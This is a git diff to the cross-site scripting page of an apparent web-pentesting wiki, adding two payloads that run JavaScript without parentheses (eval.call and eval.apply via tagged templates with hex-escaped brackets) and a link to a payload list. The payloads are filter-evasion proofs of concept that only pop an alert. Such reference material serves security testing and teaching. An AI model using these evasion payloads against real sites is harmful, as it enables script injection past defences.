diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 0ead0b09..5765d4ea 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -453,8 +453,11 @@ atob("dGhpc2lzYXN0cmluZw==") ```javascript alert`1` +eval.call`${'alert\x2823\x29'}` +eval.apply`${[`alert\x2823\x29`]}` ``` +* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) * [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) #### JavaScript comments \(from [JavaScript Comments](./#javascript-comments) trick\)